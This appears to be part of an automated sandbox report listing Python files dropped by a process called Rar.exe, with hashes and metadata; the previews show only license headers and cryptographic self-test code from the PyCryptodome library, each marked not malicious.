                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33484
                                                                                                                                                                                      Entropy (8bit):4.976278818343072
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:0r6q/tlygjylMmWp3r3Cdx3fznY89OWdtKjdw:0rp/SgjCMp3r3Cd57Y897dtKjdw
                                                                                                                                                                                      MD5:3CB37B2EE0C4CF45377BEB9DA08640F7
                                                                                                                                                                                      SHA1:2723FA871E7A5FAA48B95344D262EC8181B26D99
                                                                                                                                                                                      SHA-256:05D877E5930EE6784FD584014DC9F96F5022B788B18902907CF8283153FA252D
                                                                                                                                                                                      SHA-512:D7CE67901EE4DC0374EE449D2E0F97D2A6BC8B3E3A7042AE914E6F631D6CF136E5C5CEFC627C42514EB6F6BDED066BB777080019036D38EF2BB0B62DED88AB5F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9605
                                                                                                                                                                                      Entropy (8bit):5.31125213354927
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:M7DqrYJALrYJHdt3EHGuI4EsHg/pwJBcgIUOU9F3T6D+iDH978H3WpP9foEQTHSM:4qrskrs9t3q/IOOe3T6DF55xm+MQOp
                                                                                                                                                                                      MD5:69D45753BA108E314F2EC3139D23F1AB
                                                                                                                                                                                      SHA1:F4A946A36A10D898F0363CB435E5E2D5B3A82AA3
                                                                                                                                                                                      SHA-256:D6E8220E8F383C767A2EAC33A812B5B63962A7BAE8ED083C72EA32EB39440BC2
                                                                                                                                                                                      SHA-512:5D00264AB5B0CB21D1BB75FB5A046D545EB58EDE1B7C1E251A1D023BE2F6DBBDFCF9B8557DAB0DFD5704B876E1E96B34F97D1BD1A5224598761088114191D1AB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8695
                                                                                                                                                                                      Entropy (8bit):5.233149864619367
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4qrskrs9t3q/I9mdYbJgNZN1U+KrYK4EZjpcURPSxI3JWcJj7cBEsOp:Hrskrs9VqbdYbJgNZN1U+KrYK4EZjpcE
                                                                                                                                                                                      MD5:F0B2D0E39D7957BD5486A415E9979E34
                                                                                                                                                                                      SHA1:36FD6B0A542857E099084680148FFC5732F3246B
                                                                                                                                                                                      SHA-256:4AB75E51F66DD9C80B9B893C7EB35EEE23D93E14A6368099337987E3692D1B2B
                                                                                                                                                                                      SHA-512:30414BECFFD622EA003C416A865CC5CEDA0BEB8C28462D1499D170818E4B91AF5E42377CBECE3D344920632CB250502B6E1921833D263805AB7FACED31774150
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20491
                                                                                                                                                                                      Entropy (8bit):5.006612959191385
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Hrskrs9VqVTh5VGxNepuQTs5Tv/NoEeLi4WCImQhpHHa7DZhptMa+HRReeo8he/O:Hr6qCUDEUlJI1J4s
                                                                                                                                                                                      MD5:24B5612D20DECB36BBA91195B3D38B6C
                                                                                                                                                                                      SHA1:AFC72B63DF008E0175F1A3DBDBCABAE4A9AC4323
                                                                                                                                                                                      SHA-256:AC2B287F231294E23E8037A25773BD7A67A54A72AB1FD6FD4D2652244E985D9A
                                                                                                                                                                                      SHA-512:7989BAB6E0A17F65895E8E8966FBE9997B53DD07820E9FE3DF79C6D618E03CF9B296F46387949904F00A65FDA6292D8F59F84B1680840E069415F004521FC0BC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16958
                                                                                                                                                                                      Entropy (8bit):5.160995992543063
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:EQHvhR8hott4ZbmisW8uIeXpF+yca4etqp809eGTEQ4Mn+RBHTe/rjkbTwELKQHJ:EehuhQQsvusyv4etPaT5+WkbTxejsf
                                                                                                                                                                                      MD5:20A190205D607A6AA44E8DC20A17310C
                                                                                                                                                                                      SHA1:265351009BC9D8E1E39EB5F62F0A52C7B560BBB0
                                                                                                                                                                                      SHA-256:F99CC569B39F3163A2025A128A4323E3454BC32473624627920287EC0DBB667E
                                                                                                                                                                                      SHA-512:E8092EAC3CAB508AED453204CAA382B5FAD940425DE158106E0F738101A5E1C5326CE3402D3090E932C3DB156355DA61CEB3B7E52B358B8AF42FD5BE7C26006E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/Salsa20.py: Self-test for the Salsa20 stream cipher..#..# Written in 2013 by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11227
                                                                                                                                                                                      Entropy (8bit):4.882703342503383
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JQHv4y5ktlkZr+K2XLEGTOqZoS/O/M+pOS:JeVGmpOgGiq+S27F
                                                                                                                                                                                      MD5:7B5B7AFA67531ACD4B7753B49FCE8CAB
                                                                                                                                                                                      SHA1:1D6933BB1C12E3140C30BA4C4B7E5A10BA687900
                                                                                                                                                                                      SHA-256:A33F4341D43D86CE8F8C87F2BCCC5DE1300CA223E2A53279B20348886C17F0C7
                                                                                                                                                                                      SHA-512:15EE4D1DDBC6AF819FE33602CCF7E31DA34F15B7CF580DE0AEBF925511477D39D01C003FA2B630360FFBC724855EC555942311A6A08829E3A6581B0557EFBAE9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_15.py: Self-test for PKCS#1 v1.5 encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22796
                                                                                                                                                                                      Entropy (8bit):4.426757156222012
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:jebGB32D5suEeAnSI9lA3tsxE3WtahvrAhMxHM7jI/+Il:SK2DOuxA/v2t+MhKM7mIl
                                                                                                                                                                                      MD5:473FEB7F8AE236A1D02B3A61AE7B5514
                                                                                                                                                                                      SHA1:9B1A0F819C8511085A16B8D50A337B52A6367713
                                                                                                                                                                                      SHA-256:22DA3EC31421A2552198EF2AE00E6019DF85CBEAC74D428A50DF9CD6AB7210CA
                                                                                                                                                                                      SHA-512:2377F27C15BD33D2BC9EA87C706B9BD981623B1394CDDBE49F2E8A76B6167C00128A476774B1FBADF5D17DBF95E160DF661FDBB110A2A6E3B4652DDC3E06D2BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/test_pkcs1_oaep.py: Self-test for PKCS#1 OAEP encryption..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3879
                                                                                                                                                                                      Entropy (8bit):5.141658250590196
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NtwwEIB0jcQHMsvI/S3oCFCqD0sISG+CMAE+dNg+o2+HX+Lj+EqkIt08k42iNTZI:wwfFQHvoUgd7oXHuL6EsLN1m9mArB
                                                                                                                                                                                      MD5:89BDBFC47A5DCA90A45F4EF652DD7101
                                                                                                                                                                                      SHA1:A9C8FFA344033B3EC5B43A5DAA3DA64EEAEB704E
                                                                                                                                                                                      SHA-256:62225A7DF06D003A465C3BA5612F695BADB31559152C1492354B5C44A0A63BB5
                                                                                                                                                                                      SHA-512:C665CDC1CA849D15EDA7AB0D9E26E4DCE1CF76CDCD4CD5E942691BD9017994EB39787828CB3131AD41ED90C1887FF856D68B2FA0DD2B14F74724A0A1E59F8342
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/__init__.py: Self-test for hash modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH TH
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10168
                                                                                                                                                                                      Entropy (8bit):4.841216501855338
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ywdQHvXNIIqigCKOstqEZQY20Pe38Iy0yhFTolQycPIFZiU:yUeXNTY20238Iy0yhO+yB
                                                                                                                                                                                      MD5:84B9FB90649EE10FEC0136B69073C4C1
                                                                                                                                                                                      SHA1:8F804BA750722F19CCAC8B22915563FB3EDB0A85
                                                                                                                                                                                      SHA-256:6AA885ED7E71F39C2197E822A1867B806660F4CBF4FC8E8197C3A0ED492272F4
                                                                                                                                                                                      SHA-512:78B2A90CF9AF1E7CAEFC7BC83B9B18089013AAE849DC7D8E00B86E1BF5D399869B98D14362429D5C9576D3BD577914AE164B71E2E6489F6A8EDF40B8312B39D8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16796
                                                                                                                                                                                      Entropy (8bit):4.783532264114981
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0rskrs9Vq5HZgqlLXNSvBrpJ2mlv/Io2mDdlSvyIxs2g:0r6qbgqlDNSvZpJDlv/IoDTSvQ2g
                                                                                                                                                                                      MD5:63C8BAAC2382F26688A38B881323D894
                                                                                                                                                                                      SHA1:005EECF1A5129FF2FD3350DF3F5561B87B1026F2
                                                                                                                                                                                      SHA-256:D0770C758F2BD4BBFAC6C111050928550D39BB48254E2A9DA3934B40937FCD9F
                                                                                                                                                                                      SHA-512:135B94C2F4C5E53B1206F6AD70FDC5D3E89C47DF842920951ED75917CD4E4CA0EB2B0E3BC60F31F70F6368612B7BB4BF07EA02BFFDEB5FC0276B3D365B08A0D3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13808
                                                                                                                                                                                      Entropy (8bit):5.08051172614129
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Nqrskrs9t3q/Iiuaov/mlD7Y2v6W3nVJiUQkK/OroaaOh:krskrs9VqBm2LFJjK2Hl
                                                                                                                                                                                      MD5:70594C0C5C1D69E570F8115F02EC0FDF
                                                                                                                                                                                      SHA1:6B6BB2EF4F4C0BF757485FDF8EA0043F773F1D77
                                                                                                                                                                                      SHA-256:9158FFBC96E70A527A5D5758A3E9D98D9DC8905818FB747A1A800A294A17D320
                                                                                                                                                                                      SHA-512:19CB67F0CC67F4876D9319558C27118E34C2AF3DB7094CBB358BFC1A159396F5C3AF29EF39F1F1FDFF718C01159D9230651E6F92C1739D07486CC7E412EE2C87
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# SelfTest/Hash/CMAC.py: Self-test for the CMAC module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO E
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20489
                                                                                                                                                                                      Entropy (8bit):5.153740738312008
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:UwdQHvJzEI5mSHorDwxwwbTc9untXdDGVoyGZ6GoGd4q1EGhEGmKOuCdliWErLOp:UUe9O6orMTc9upR2oya6b04q1EEEYmB
                                                                                                                                                                                      MD5:D0E673489A9A73F4F6A9C8F8A12E6F1B
                                                                                                                                                                                      SHA1:61EB91C23346DD275DAA966EB6BC3BBCE71288C9
                                                                                                                                                                                      SHA-256:1F8AD7D399CE6D2449F3413E26BF73403860C79114807776DA866E29E764606A
                                                                                                                                                                                      SHA-512:AAEAF15D71C6AC3EA55A64A60E6E51A0DF37AA36FC21E5952D539E15BA781CC22C57CE907D858BF10EF12DEF87CD1696CD3D2FCD594008C6544A8BC787498FC4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/HMAC.py: Self-test for the HMAC module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12050
                                                                                                                                                                                      Entropy (8bit):4.62363520730185
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:KCuRMf+Lb6RdXoVtMocxo1wBofWuFo/JAo1wBofWC+Po1wBofWFO0tzCerYb+Oa:l586Rd4T5FuhTFdFmO0tYb6
                                                                                                                                                                                      MD5:01EFB03BD8164982157BB85495EEA984
                                                                                                                                                                                      SHA1:1ACB78C5EDFFD8E3029CE23AD2361D9E0D80D884
                                                                                                                                                                                      SHA-256:3BD587FF74064862E669CDFB0AFC6EF1489E751C9F67746757F0CC3F4F62D0E3
                                                                                                                                                                                      SHA-512:65C3FEF9E21662C45C57ED544F9956E8AF6FE072115084CF52FFC796FB30CC98DC03B96A838DA895DFDDBB8B5B00FBDAD3E8FAE2DD8F5CAA8D0E4301A9576684
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import unittest..from binascii import unhexlify, hexlify....from Crypto.Util.py3compat import tobytes..from Crypto.Util.strxor import strxor_c..from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import KMAC128, KMAC256......class KMACTest(unittest.TestCase):.... def new(self, *args, **kwargs):.. return self.KMAC.new(key=b'X' * (self.minimum_key_bits // 8), *args, **kwargs).... def test_new_positive(self):.... key = b'X' * 32.... h = self.new().. for new_func in self.KMAC.new, h.new:.... for dbytes in range(self.minimum_bytes, 128 + 1):.. hobj = new_func(key=key, mac_len=dbytes).. self.assertEqual(hobj.digest_size, dbytes).... digest1 = new_func(key=key, data=b"\x90").digest().. digest2 = new_func(key=key).update(b"\x90").digest().. self.assertEqual(digest1, digest2).... new_func(data=b"A", key=key, custom=b"g").... hobj = h.new(key=key)..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12085
                                                                                                                                                                                      Entropy (8bit):5.069402054924231
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Gqrskrs9t3q/IEPNfCuz+CSwVR7RRUpWCtuAbHQNXa8aXiJm6mkmGrrDkcpMgw9d:xrskrs9VqrPNfC6RLCtuA52FBf3s974G
                                                                                                                                                                                      MD5:51BC6116F75310E905FF849BFAD261E3
                                                                                                                                                                                      SHA1:677B0343C2B13AC9A1EFA4A0BDB6EA131F2C9E86
                                                                                                                                                                                      SHA-256:0C889CE5DD48A302E3B9F9319CAD868CF7B12361715FD5DD4E37EF26259A50E8
                                                                                                                                                                                      SHA-512:1791D19938C5F45CB2A7F784379662DB7230F74A060A12FD7C50EAF55962FE76F855FA4DFDDA1E502739FCC1FBD3A58675AA0CA804C48CBCF8E2854B6BF411E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
